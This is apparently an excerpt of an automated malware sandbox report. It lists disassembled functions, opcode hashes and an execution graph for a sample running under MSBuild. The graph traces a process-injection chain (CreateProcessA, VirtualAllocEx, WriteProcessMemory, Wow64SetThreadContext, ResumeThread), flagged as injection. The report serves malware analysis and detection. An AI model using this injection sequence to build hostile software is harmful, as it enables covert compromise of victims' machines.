                                              Function 06909BE0 Relevance: .0, Instructions: 30COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2166170733.0000000006900000.00000040.00000800.00020000.00000000.sdmp, Offset: 06900000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_6900000_MSBuild.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 6e880a5427cd0d2349821d1444feaa0fb36dd13c0270bf351b1e2d5be1e9cb73
                                              • Instruction ID: d2801b7cf848963986ec0fc2180a44b13a2d693093b43795b78bef96b10ba328
                                              • Opcode Fuzzy Hash: 6e880a5427cd0d2349821d1444feaa0fb36dd13c0270bf351b1e2d5be1e9cb73
                                              • Instruction Fuzzy Hash: B2E06870E102087FEF50DE70C881B5A3BADCB42104F2044A1E40CCB683E536CA018340
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 06907DF9 Relevance: .0, Instructions: 25COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2166170733.0000000006900000.00000040.00000800.00020000.00000000.sdmp, Offset: 06900000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_6900000_MSBuild.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: fb0a894ee9b8e9bda76913976d3422d52655494caf0d9b18a52d5b382cb7580e
                                              • Instruction ID: ca9d51b2cc5c5e5c2b9de054e9d8ac76eb94eb339762896de5b50b2224031e5d
                                              • Opcode Fuzzy Hash: fb0a894ee9b8e9bda76913976d3422d52655494caf0d9b18a52d5b382cb7580e
                                              • Instruction Fuzzy Hash: CEF0FE70A11129DFDB24DF90E859BADBB76FF88710F204519E402E7694CB741C41CB80
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Execution Graph

                                              Execution Coverage:11%
                                              Dynamic/Decrypted Code Coverage:100%
                                              Signature Coverage:0%
                                              Total number of Nodes:220
                                              Total number of Limit Nodes:14
                                              execution_graph 25716 aa4668 25717 aa467a 25716->25717 25718 aa4686 25717->25718 25720 aa4778 25717->25720 25721 aa479d 25720->25721 25725 aa4888 25721->25725 25729 aa4878 25721->25729 25726 aa48af 25725->25726 25727 aa498c 25726->25727 25733 aa449c 25726->25733 25730 aa48af 25729->25730 25731 aa498c 25730->25731 25732 aa449c CreateActCtxA 25730->25732 25731->25731 25732->25731 25734 aa5918 CreateActCtxA 25733->25734 25736 aa59db 25734->25736 25746 aad0b8 25747 aad0fe GetCurrentProcess 25746->25747 25749 aad149 25747->25749 25750 aad150 GetCurrentThread 25747->25750 25749->25750 25751 aad18d GetCurrentProcess 25750->25751 25752 aad186 25750->25752 25753 aad1c3 25751->25753 25752->25751 25754 aad1eb GetCurrentThreadId 25753->25754 25755 aad21c 25754->25755 25756 aaad38 25757 aaad47 25756->25757 25760 aaae30 25756->25760 25768 aaae21 25756->25768 25761 aaae41 25760->25761 25763 aaae64 25760->25763 25761->25763 25776 aab0c8 25761->25776 25780 aab0b9 25761->25780 25762 aaae5c 25762->25763 25764 aab068 GetModuleHandleW 25762->25764 25763->25757 25765 aab095 25764->25765 25765->25757 25769 aaae41 25768->25769 25770 aaae64 25768->25770 25769->25770 25774 aab0c8 LoadLibraryExW 25769->25774 25775 aab0b9 LoadLibraryExW 25769->25775 25770->25757 25771 aaae5c 25771->25770 25772 aab068 GetModuleHandleW 25771->25772 25773 aab095 25772->25773 25773->25757 25774->25771 25775->25771 25777 aab0dc 25776->25777 25779 aab101 25777->25779 25784 aaa870 25777->25784 25779->25762 25781 aab0dc 25780->25781 25782 aab101 25781->25782 25783 aaa870 LoadLibraryExW 25781->25783 25782->25762 25783->25782 25785 aab2a8 LoadLibraryExW 25784->25785 25787 aab321 25785->25787 25787->25779 25737 23dd158 25738 23dd2e3 25737->25738 25739 23dd17e 25737->25739 25739->25738 25741 23dadbc 25739->25741 25742 23dd3d8 PostMessageW 25741->25742 25743 23dd444 25742->25743 25743->25739 25788 23d9ba4 25789 23d9ae5 25788->25789 25790 23d9acc 25788->25790 25794 23dbf70 25789->25794 25815 23dbfde 25789->25815 25837 23dbf80 25789->25837 25795 23dbf80 25794->25795 25802 23dbfbe 25795->25802 25858 23dc5dc 25795->25858 25863 23dc4c1 25795->25863 25868 23dc9c4 25795->25868 25872 23dc845 25795->25872 25877 23dc66b 25795->25877 25882 23dc3c9 25795->25882 25886 23dc48e 25795->25886 25892 23dc6ee 25795->25892 25897 23dc44e 25795->25897 25902 23dc8cf 25795->25902 25907 23dc972 25795->25907 25912 23dc872 25795->25912 25917 23dc470 25795->25917 25922 23dc554 25795->25922 25927 23dc45a 25795->25927 25932 23dc57a 25795->25932 25938 23dc5fb 25795->25938 25942 23dc41f 25795->25942 25802->25790 25816 23dbfe1 25815->25816 25817 23dbf6c 25815->25817 25816->25790 25818 23dbfbe 25817->25818 25819 23dc5dc 2 API calls 25817->25819 25820 23dc41f 2 API calls 25817->25820 25821 23dc5fb 2 API calls 25817->25821 25822 23dc57a 2 API calls 25817->25822 25823 23dc45a 2 API calls 25817->25823 25824 23dc554 2 API calls 25817->25824 25825 23dc470 2 API calls 25817->25825 25826 23dc872 2 API calls 25817->25826 25827 23dc972 2 API calls 25817->25827 25828 23dc8cf 2 API calls 25817->25828 25829 23dc44e 2 API calls 25817->25829 25830 23dc6ee 2 API calls 25817->25830 25831 23dc48e 2 API calls 25817->25831 25832 23dc3c9 2 API calls 25817->25832 25833 23dc66b 2 API calls 25817->25833 25834 23dc845 2 API calls 25817->25834 25835 23dc9c4 2 API calls 25817->25835 25836 23dc4c1 2 API calls 25817->25836 25818->25790 25819->25818 25820->25818 25821->25818 25822->25818 25823->25818 25824->25818 25825->25818 25826->25818 25827->25818 25828->25818 25829->25818 25830->25818 25831->25818 25832->25818 25833->25818 25834->25818 25835->25818 25836->25818 25838 23dbf9a 25837->25838 25839 23dc5dc 2 API calls 25838->25839 25840 23dc41f 2 API calls 25838->25840 25841 23dc5fb 2 API calls 25838->25841 25842 23dc57a 2 API calls 25838->25842 25843 23dc45a 2 API calls 25838->25843 25844 23dc554 2 API calls 25838->25844 25845 23dbfbe 25838->25845 25846 23dc470 2 API calls 25838->25846 25847 23dc872 2 API calls 25838->25847 25848 23dc972 2 API calls 25838->25848 25849 23dc8cf 2 API calls 25838->25849 25850 23dc44e 2 API calls 25838->25850 25851 23dc6ee 2 API calls 25838->25851 25852 23dc48e 2 API calls 25838->25852 25853 23dc3c9 2 API calls 25838->25853 25854 23dc66b 2 API calls 25838->25854 25855 23dc845 2 API calls 25838->25855 25856 23dc9c4 2 API calls 25838->25856 25857 23dc4c1 2 API calls 25838->25857 25839->25845 25840->25845 25841->25845 25842->25845 25843->25845 25844->25845 25845->25790 25846->25845 25847->25845 25848->25845 25849->25845 25850->25845 25851->25845 25852->25845 25853->25845 25854->25845 25855->25845 25856->25845 25857->25845 25859 23dc8f7 25858->25859 25947 23d9398 25859->25947 25951 23d9390 25859->25951 25860 23dc919 25864 23dc51d 25863->25864 25955 23d91e8 25864->25955 25959 23d91e1 25864->25959 25865 23dc53e 25963 23d92a8 25868->25963 25967 23d92a0 25868->25967 25869 23dc777 25873 23dc938 25872->25873 25971 23d9108 25873->25971 25975 23d9110 25873->25975 25874 23dc953 25878 23dc629 25877->25878 25879 23dc5fa 25877->25879 25878->25802 25880 23d92a8 WriteProcessMemory 25879->25880 25881 23d92a0 WriteProcessMemory 25879->25881 25880->25878 25881->25878 25979 23d9524 25882->25979 25983 23d9530 25882->25983 25883 23dc400 25888 23dc45c 25886->25888 25887 23dc84a 25887->25802 25888->25887 25890 23d92a8 WriteProcessMemory 25888->25890 25891 23d92a0 WriteProcessMemory 25888->25891 25889 23dc6ce 25890->25889 25891->25889 25893 23dcc38 25892->25893 25895 23d9108 Wow64SetThreadContext 25893->25895 25896 23d9110 Wow64SetThreadContext 25893->25896 25894 23dcc53 25894->25802 25895->25894 25896->25894 25898 23dc41f 25897->25898 25898->25802 25899 23dc504 25898->25899 25987 23d9058 25898->25987 25991 23d9060 25898->25991 25899->25802 25903 23dc41f 25902->25903 25903->25802 25904 23dc504 25903->25904 25905 23d9058 ResumeThread 25903->25905 25906 23d9060 ResumeThread 25903->25906 25904->25802 25905->25903 25906->25903 25908 23dc41f 25907->25908 25908->25802 25909 23dc504 25908->25909 25910 23d9058 ResumeThread 25908->25910 25911 23d9060 ResumeThread 25908->25911 25909->25802 25910->25908 25911->25908 25914 23dc41f 25912->25914 25913 23dc504 25913->25802 25914->25802 25914->25913 25915 23d9058 ResumeThread 25914->25915 25916 23d9060 ResumeThread 25914->25916 25915->25914 25916->25914 25918 23dc41f 25917->25918 25918->25802 25919 23dc504 25918->25919 25920 23d9058 ResumeThread 25918->25920 25921 23d9060 ResumeThread 25918->25921 25919->25802 25920->25918 25921->25918 25924 23dc573 25922->25924 25923 23dc6ce 25925 23d92a8 WriteProcessMemory 25924->25925 25926 23d92a0 WriteProcessMemory 25924->25926 25925->25923 25926->25923 25928 23dc566 25927->25928 25930 23d92a8 WriteProcessMemory 25928->25930 25931 23d92a0 WriteProcessMemory 25928->25931 25929 23dc6ce 25930->25929 25931->25929 25933 23dc51d 25932->25933 25934 23dc594 25932->25934 25936 23d91e8 VirtualAllocEx 25933->25936 25937 23d91e1 VirtualAllocEx 25933->25937 25935 23dc53e 25936->25935 25937->25935 25940 23d92a8 WriteProcessMemory 25938->25940 25941 23d92a0 WriteProcessMemory 25938->25941 25939 23dc629 25939->25802 25940->25939 25941->25939 25943 23dc428 25942->25943 25943->25802 25943->25942 25944 23dc504 25943->25944 25945 23d9058 ResumeThread 25943->25945 25946 23d9060 ResumeThread 25943->25946 25944->25802 25945->25943 25946->25943 25948 23d93e3 ReadProcessMemory 25947->25948 25950 23d9427 25948->25950 25950->25860 25952 23d93e3 ReadProcessMemory 25951->25952 25954 23d9427 25952->25954 25954->25860 25956 23d9228 VirtualAllocEx 25955->25956 25958 23d9265 25956->25958 25958->25865 25960 23d91e8 VirtualAllocEx 25959->25960 25962 23d9265 25960->25962 25962->25865 25964 23d92f0 WriteProcessMemory 25963->25964 25966 23d9347 25964->25966 25966->25869 25968 23d92a8 WriteProcessMemory 25967->25968 25970 23d9347 25968->25970 25970->25869 25972 23d9155 Wow64SetThreadContext 25971->25972 25974 23d919d 25972->25974 25974->25874 25976 23d9155 Wow64SetThreadContext 25975->25976 25978 23d919d 25976->25978 25978->25874 25980 23d9530 CreateProcessA 25979->25980 25982 23d977b 25980->25982 25982->25982 25984 23d95b9 CreateProcessA 25983->25984 25986 23d977b 25984->25986 25986->25986 25988 23d90a0 ResumeThread 25987->25988 25990 23d90d1 25988->25990 25990->25898 25992 23d90a0 ResumeThread 25991->25992 25994 23d90d1 25992->25994 25994->25898 25744 aad300 DuplicateHandle 25745 aad396 25744->25745

                                              Executed Functions

                                              Function 00AAD0A8 Relevance: 6.1, APIs: 4, Instructions: 133threadCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              APIs
                                              • GetCurrentProcess.KERNEL32 ref: 00AAD136
                                              • GetCurrentThread.KERNEL32 ref: 00AAD173
                                              • GetCurrentProcess.KERNEL32 ref: 00AAD1B0
                                              • GetCurrentThreadId.KERNEL32 ref: 00AAD209
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.2176880213.0000000000AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AA0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_aa0000_TgfQNrhQjjseHY.jbxd
                                              Similarity
                                              • API ID: Current$ProcessThread
                                              • String ID:
                                              • API String ID: 2063062207-0
                                              • Opcode ID: dc4baa565b8a18f69428c70d80471cd1c9bbe232cfaba64d8b18a52f73c40f01
                                              • Instruction ID: cdb328e1e95763fbea31ba3bc45859e0180123352e0e5bb0efe8c528ed2fa7e1
                                              • Opcode Fuzzy Hash: dc4baa565b8a18f69428c70d80471cd1c9bbe232cfaba64d8b18a52f73c40f01
                                              • Instruction Fuzzy Hash: 255165B0900249CFDB14CFAAD548BEEBFF1EF89314F20859AE009A72A1DB345944CF65
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00AAD0B8 Relevance: 6.1, APIs: 4, Instructions: 128threadCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              APIs
                                              • GetCurrentProcess.KERNEL32 ref: 00AAD136
                                              • GetCurrentThread.KERNEL32 ref: 00AAD173
                                              • GetCurrentProcess.KERNEL32 ref: 00AAD1B0
                                              • GetCurrentThreadId.KERNEL32 ref: 00AAD209
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.2176880213.0000000000AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AA0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_aa0000_TgfQNrhQjjseHY.jbxd
                                              Similarity
                                              • API ID: Current$ProcessThread
                                              • String ID:
                                              • API String ID: 2063062207-0
                                              • Opcode ID: d089300c17f7e1a19b4401d9ef9c4ea0a0433f983101f0ca98406c7593248f23
                                              • Instruction ID: 8211e6140bb5843bf61e91c1eb813cb9fe21f5de3120c802fa3c55a7e48576d0
                                              • Opcode Fuzzy Hash: d089300c17f7e1a19b4401d9ef9c4ea0a0433f983101f0ca98406c7593248f23
                                              • Instruction Fuzzy Hash: 805154B0D00249DFDB14CFAAD548B9EBBF1EF89314F208559E409A73A0DB749944CF65
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 023D9524 Relevance: 1.7, APIs: 1, Instructions: 247processCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 44 23d9524-23d95c5 47 23d95fe-23d961e 44->47 48 23d95c7-23d95d1 44->48 55 23d9657-23d9686 47->55 56 23d9620-23d962a 47->56 48->47 49 23d95d3-23d95d5 48->49 51 23d95f8-23d95fb 49->51 52 23d95d7-23d95e1 49->52 51->47 53 23d95e5-23d95f4 52->53 54 23d95e3 52->54 53->53 57 23d95f6 53->57 54->53 62 23d96bf-23d9779 CreateProcessA 55->62 63 23d9688-23d9692 55->63 56->55 58 23d962c-23d962e 56->58 57->51 60 23d9651-23d9654 58->60 61 23d9630-23d963a 58->61 60->55 64 23d963c 61->64 65 23d963e-23d964d 61->65 76 23d977b-23d9781 62->76 77 23d9782-23d9808 62->77 63->62 66 23d9694-23d9696 63->66 64->65 65->65 67 23d964f 65->67 68 23d96b9-23d96bc 66->68 69 23d9698-23d96a2 66->69 67->60 68->62 71 23d96a4 69->71 72 23d96a6-23d96b5 69->72 71->72 72->72 73 23d96b7 72->73 73->68 76->77 87 23d9818-23d981c 77->87 88 23d980a-23d980e 77->88 89 23d982c-23d9830 87->89 90 23d981e-23d9822 87->90 88->87 91 23d9810 88->91 93 23d9840-23d9844 89->93 94 23d9832-23d9836 89->94 90->89 92 23d9824 90->92 91->87 92->89 96 23d9856-23d985d 93->96 97 23d9846-23d984c 93->97 94->93 95 23d9838 94->95 95->93 98 23d985f-23d986e 96->98 99 23d9874 96->99 97->96 98->99 100 23d9875 99->100 100->100
                                              APIs
                                              • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 023D9766
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.2177666388.00000000023D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023D0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_23d0000_TgfQNrhQjjseHY.jbxd
                                              Similarity
                                              • API ID: CreateProcess
                                              • String ID:
                                              • API String ID: 963392458-0
                                              • Opcode ID: 26a262838fd556b5de4b8f0c07d3ccdb47b429373ec222f9cc52de38351c827a
                                              • Instruction ID: af4c4cc525fd55dc798058e650397a51eb4648deb191372a2ea36124c5a998e9
                                              • Opcode Fuzzy Hash: 26a262838fd556b5de4b8f0c07d3ccdb47b429373ec222f9cc52de38351c827a
                                              • Instruction Fuzzy Hash: 2CA16C72D00259DFEF20CF68D841BEEBBB2BF48714F0481A9E809A7240DB759985CF91
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 023D9530 Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 102 23d9530-23d95c5 104 23d95fe-23d961e 102->104 105 23d95c7-23d95d1 102->105 112 23d9657-23d9686 104->112 113 23d9620-23d962a 104->113 105->104 106 23d95d3-23d95d5 105->106 108 23d95f8-23d95fb 106->108 109 23d95d7-23d95e1 106->109 108->104 110 23d95e5-23d95f4 109->110 111 23d95e3 109->111 110->110 114 23d95f6 110->114 111->110 119 23d96bf-23d9779 CreateProcessA 112->119 120 23d9688-23d9692 112->120 113->112 115 23d962c-23d962e 113->115 114->108 117 23d9651-23d9654 115->117 118 23d9630-23d963a 115->118 117->112 121 23d963c 118->121 122 23d963e-23d964d 118->122 133 23d977b-23d9781 119->133 134 23d9782-23d9808 119->134 120->119 123 23d9694-23d9696 120->123 121->122 122->122 124 23d964f 122->124 125 23d96b9-23d96bc 123->125 126 23d9698-23d96a2 123->126 124->117 125->119 128 23d96a4 126->128 129 23d96a6-23d96b5 126->129 128->129 129->129 130 23d96b7 129->130 130->125 133->134 144 23d9818-23d981c 134->144 145 23d980a-23d980e 134->145 146 23d982c-23d9830 144->146 147 23d981e-23d9822 144->147 145->144 148 23d9810 145->148 150 23d9840-23d9844 146->150 151 23d9832-23d9836 146->151 147->146 149 23d9824 147->149 148->144 149->146 153 23d9856-23d985d 150->153 154 23d9846-23d984c 150->154 151->150 152 23d9838 151->152 152->150 155 23d985f-23d986e 153->155 156 23d9874 153->156 154->153 155->156 157 23d9875 156->157 157->157
                                              APIs
                                              • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 023D9766
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.2177666388.00000000023D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023D0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_23d0000_TgfQNrhQjjseHY.jbxd
                                              Similarity
                                              • API ID: CreateProcess
                                              • String ID:
                                              • API String ID: 963392458-0
                                              • Opcode ID: 8c24b48bccfceba13096e5c746226d52b7f6306209d2a39e15f116a59afafea3
                                              • Instruction ID: 5ad9fcea7572a85a5631474fa13e5e9b2fb23f42aad3a55093a19c3c8fb19bc6
                                              • Opcode Fuzzy Hash: 8c24b48bccfceba13096e5c746226d52b7f6306209d2a39e15f116a59afafea3
                                              • Instruction Fuzzy Hash: ED915C72D00259CFEF20DF69D841BEEBBB2BF48714F1481A9E809A7240DB759985CF91
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00AAAE30 Relevance: 1.7, APIs: 1, Instructions: 197COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 159 aaae30-aaae3f 160 aaae6b-aaae6f 159->160 161 aaae41-aaae4e call aa9838 159->161 163 aaae83-aaaec4 160->163 164 aaae71-aaae7b 160->164 167 aaae50 161->167 168 aaae64 161->168 170 aaaed1-aaaedf 163->170 171 aaaec6-aaaece 163->171 164->163 214 aaae56 call aab0c8 167->214 215 aaae56 call aab0b9 167->215 168->160 172 aaaf03-aaaf05 170->172 173 aaaee1-aaaee6 170->173 171->170 178 aaaf08-aaaf0f 172->178 175 aaaee8-aaaeef call aaa814 173->175 176 aaaef1 173->176 174 aaae5c-aaae5e 174->168 177 aaafa0-aab060 174->177 182 aaaef3-aaaf01 175->182 176->182 209 aab068-aab093 GetModuleHandleW 177->209 210 aab062-aab065 177->210 180 aaaf1c-aaaf23 178->180 181 aaaf11-aaaf19 178->181 185 aaaf30-aaaf39 call aaa824 180->185 186 aaaf25-aaaf2d 180->186 181->180 182->178 190 aaaf3b-aaaf43 185->190 191 aaaf46-aaaf4b 185->191 186->185 190->191 192 aaaf69-aaaf6d 191->192 193 aaaf4d-aaaf54 191->193 198 aaaf73-aaaf76 192->198 193->192 195 aaaf56-aaaf66 call aaa834 call aaa844 193->195 195->192 200 aaaf78-aaaf96 198->200 201 aaaf99-aaaf9f 198->201 200->201 211 aab09c-aab0b0 209->211 212 aab095-aab09b 209->212 210->209 212->211 214->174 215->174
                                              APIs
                                              • GetModuleHandleW.KERNELBASE(00000000), ref: 00AAB086
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.2176880213.0000000000AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AA0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_aa0000_TgfQNrhQjjseHY.jbxd
                                              Similarity
                                              • API ID: HandleModule
                                              • String ID:
                                              • API String ID: 4139908857-0
                                              • Opcode ID: 21a617f700693d8630f6393458960e3fa900e3283ce6a358d7e29697357f8f20
                                              • Instruction ID: 3496cdd38eb5857a407ed03ccf1bd411fc2b2b393423c18be9344825d318d44e
                                              • Opcode Fuzzy Hash: 21a617f700693d8630f6393458960e3fa900e3283ce6a358d7e29697357f8f20
                                              • Instruction Fuzzy Hash: 57716770A00B058FDB24DF2AD45079ABBF1FF89700F108A2EE44AD7A90D775E849CB91
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00AA590C Relevance: 1.6, APIs: 1, Instructions: 98COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 216 aa590c-aa59d9 CreateActCtxA 218 aa59db-aa59e1 216->218 219 aa59e2-aa5a3c 216->219 218->219 226 aa5a4b-aa5a4f 219->226 227 aa5a3e-aa5a41 219->227 228 aa5a60 226->228 229 aa5a51-aa5a5d 226->229 227->226 230 aa5a61 228->230 229->228 230->230
                                              APIs
                                              • CreateActCtxA.KERNEL32(?), ref: 00AA59C9
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.2176880213.0000000000AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AA0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_aa0000_TgfQNrhQjjseHY.jbxd
                                              Similarity
                                              • API ID: Create
                                              • String ID:
                                              • API String ID: 2289755597-0
                                              • Opcode ID: 4c932eabfa6a398ab07fde23b1d6eb26951948ca41d0fc229c752b0f016db07c
                                              • Instruction ID: 5c3210437537b04d506d02171424058d39f370f54ae0fd12e37f8dcd34669db6
                                              • Opcode Fuzzy Hash: 4c932eabfa6a398ab07fde23b1d6eb26951948ca41d0fc229c752b0f016db07c
                                              • Instruction Fuzzy Hash: 2B41E0B0C0075DCBEB24CFAAC884BDEBBB5BF89714F20815AD408AB255DB756946CF50
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00AA449C Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 232 aa449c-aa59d9 CreateActCtxA 235 aa59db-aa59e1 232->235 236 aa59e2-aa5a3c 232->236 235->236 243 aa5a4b-aa5a4f 236->243 244 aa5a3e-aa5a41 236->244 245 aa5a60 243->245 246 aa5a51-aa5a5d 243->246 244->243 247 aa5a61 245->247 246->245 247->247
                                              APIs
                                              • CreateActCtxA.KERNEL32(?), ref: 00AA59C9
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.2176880213.0000000000AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AA0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_aa0000_TgfQNrhQjjseHY.jbxd
                                              Similarity
                                              • API ID: Create
                                              • String ID:
                                              • API String ID: 2289755597-0
                                              • Opcode ID: d321f086d010babd0200c1bc306c348cab22e300967615828831037bab164264
                                              • Instruction ID: c1aba1675817031badaae41acd50c76eca146e5bc761863a2130241f420ad3fc
                                              • Opcode Fuzzy Hash: d321f086d010babd0200c1bc306c348cab22e300967615828831037bab164264
                                              • Instruction Fuzzy Hash: C041DFB0D0071DCBEB24CFAAC884B8EBBB5BF49714F20816AD408AB255DB756945CF90
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 023D92A0 Relevance: 1.6, APIs: 1, Instructions: 73injectionCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 249 23d92a0-23d92f6 252 23d92f8-23d9304 249->252 253 23d9306-23d9345 WriteProcessMemory 249->253 252->253 255 23d934e-23d937e 253->255 256 23d9347-23d934d 253->256 256->255
                                              APIs
                                              • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 023D9338
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.2177666388.00000000023D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023D0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_23d0000_TgfQNrhQjjseHY.jbxd
                                              Similarity
                                              • API ID: MemoryProcessWrite
                                              • String ID:
                                              • API String ID: 3559483778-0
                                              • Opcode ID: 7bd7c010d5989e8393d07642f770729f11ed701b581c88dc260a57e5ed231721
                                              • Instruction ID: f626e256567a4bce43cfb28315a3caca808d42ae1cd8a57456babddd110922e6
                                              • Opcode Fuzzy Hash: 7bd7c010d5989e8393d07642f770729f11ed701b581c88dc260a57e5ed231721
                                              • Instruction Fuzzy Hash: F1213772D003499FDB10CFAAC885BDEBBF5FF48714F108429E919A7240D7789955CBA0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 023D92A8 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 260 23d92a8-23d92f6 262 23d92f8-23d9304 260->262 263 23d9306-23d9345 WriteProcessMemory 260->263 262->263 265 23d934e-23d937e 263->265 266 23d9347-23d934d 263->266 266->265
                                              APIs
                                              • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 023D9338
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.2177666388.00000000023D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023D0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_23d0000_TgfQNrhQjjseHY.jbxd
                                              Similarity
                                              • API ID: MemoryProcessWrite
                                              • String ID:
                                              • API String ID: 3559483778-0
                                              • Opcode ID: 340741a57116f23dd4f903b50219d9fc7d3a480bbf8e6b7582f13fa0367c3839
                                              • Instruction ID: abedabea0bdc6e21346faecc1d863a175b23883ff04e6d6b025f9c938cdb54f1
                                              • Opcode Fuzzy Hash: 340741a57116f23dd4f903b50219d9fc7d3a480bbf8e6b7582f13fa0367c3839
                                              • Instruction Fuzzy Hash: 63212776900349DFDB10CFAAC885BDEBBF5FF88324F108429E918A7240D7789950CBA1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00AAD2F9 Relevance: 1.6, APIs: 1, Instructions: 64COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 270 aad2f9-aad394 DuplicateHandle 271 aad39d-aad3ba 270->271 272 aad396-aad39c 270->272 272->271
                                              APIs
                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00AAD387
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.2176880213.0000000000AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AA0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_aa0000_TgfQNrhQjjseHY.jbxd
                                              Similarity
                                              • API ID: DuplicateHandle
                                              • String ID:
                                              • API String ID: 3793708945-0
                                              • Opcode ID: d0bd5e283b1fc49e6a97935bf353ba589710d82e5bfc68d018a295b1a0d952e4
                                              • Instruction ID: f40f7160610eb1416e9091c22f97662349d8b642249039cb6107415f9ac44e90
                                              • Opcode Fuzzy Hash: d0bd5e283b1fc49e6a97935bf353ba589710d82e5bfc68d018a295b1a0d952e4
                                              • Instruction Fuzzy Hash: 922103B5D00248DFDB10CFAAD885AEEBFF4EB48320F14801AE958A3250C375A940CFA1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 023D9390 Relevance: 1.6, APIs: 1, Instructions: 64COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 285 23d9390-23d9425 ReadProcessMemory 288 23d942e-23d945e 285->288 289 23d9427-23d942d 285->289 289->288
                                              APIs
                                              • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 023D9418
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.2177666388.00000000023D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023D0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_23d0000_TgfQNrhQjjseHY.jbxd
                                              Similarity
                                              • API ID: MemoryProcessRead
                                              • String ID:
                                              • API String ID: 1726664587-0
                                              • Opcode ID: cd591d7694f855a9aa304f28fc0df7e210503ae173867e312a616617e2b21dec
                                              • Instruction ID: 22dcd6d285cd36fa54031471f9af27557e8da8be9ae859cfb8119facb2763f88
                                              • Opcode Fuzzy Hash: cd591d7694f855a9aa304f28fc0df7e210503ae173867e312a616617e2b21dec
                                              • Instruction Fuzzy Hash: FF214875D002499FDB10CFAAC881BEEBBF5FF88320F10842AE918A7241C7399500CBA0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

